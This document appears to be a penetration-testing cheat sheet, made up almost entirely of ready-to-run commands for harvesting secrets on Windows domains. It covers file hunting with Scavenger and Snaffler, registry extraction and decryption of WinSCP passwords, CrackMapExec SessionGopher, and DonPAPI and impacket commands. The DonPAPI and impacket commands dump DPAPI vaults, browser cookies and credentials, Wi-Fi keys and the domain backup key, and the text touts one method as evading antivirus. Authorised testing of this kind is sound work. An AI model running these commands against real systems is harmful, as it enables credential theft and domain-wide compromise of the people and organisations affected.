# Scavenger is a tool used above CrackMapExec to automate the process# of looking for sensitive files and informations during Internal Pentest
python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local
$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite
WinSCP
# WinSCP is potentially exploitable in the registry if not using a master password# You can manually request the key
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2"
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2\Sessions\username@ip"# Then let s recover the password using the following binary
https://github.com/anoopengineer/winscppasswd/releases
.\winscppasswd ip user
# Automatisation using CrackMapExec# Using invoke_sessiongopher you can recover informations about PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP
crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher
Snaffler
https://github.com/SnaffCon/Snaffler
# Snaffler is a tool made to automate information gathering on windows and domains# it focuses location such as network shares etc.
snaffler.exe -s -o snaffler.log
-o Enables outputting results to a file. You probably want this if youre not using -s. e.g. -o C:\users\thing\snaffler.log
-s Enables outputting results to stdout as soon as theyre found. You probably want this if you re not using -o.
-v Controls verbosity level, options are Trace (most verbose), Debug (less verbose), Info (less verbose still, default), and Data (results only). e.g -v debug
-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.
-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.
-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.
-d Domain to search for computers to search for shares on to search for files in. Easy.
-c Domain controller to query for the list of domain computers.
-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.
-j How many bytes of context either side of found strings in files to show, e.g. -j 200
-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.
DonPAPI
https://github.com/login-securite/DonPAPI
# Dumping revelant information on compromised targets without AV detection # With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.# Currently gathered info# - Windows credentials (Taskscheduled credentials & a lot more)# - Windows Vaults# - Windows RDP credentials# - AdConnect (still require a manual operation)# - Wifi key# - Intenet explorer Creentials# - Chrome cookies & credentials# - Firefox cookies & credentials# - VNC passwords# - mRemoteNG password (with default config)# Classic launch
DonPAPI.py domain/user:passw0rd@target
# Using hash
DonPAPI.py --hashes <LM>:<NT> domain/user@target
# Using Kerberos or local auth
DonPAPI.py -k domain/user@target
DonPAPI.py -local_auth user@target
# If user has LAPS reading privilege
DonPAPI.py -laps domain/user:passw0rd@target
# If you are domain admin, you can dump the domain backup key using impacket# Then you can use the PVK (backup key) to dump all users secrets
dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list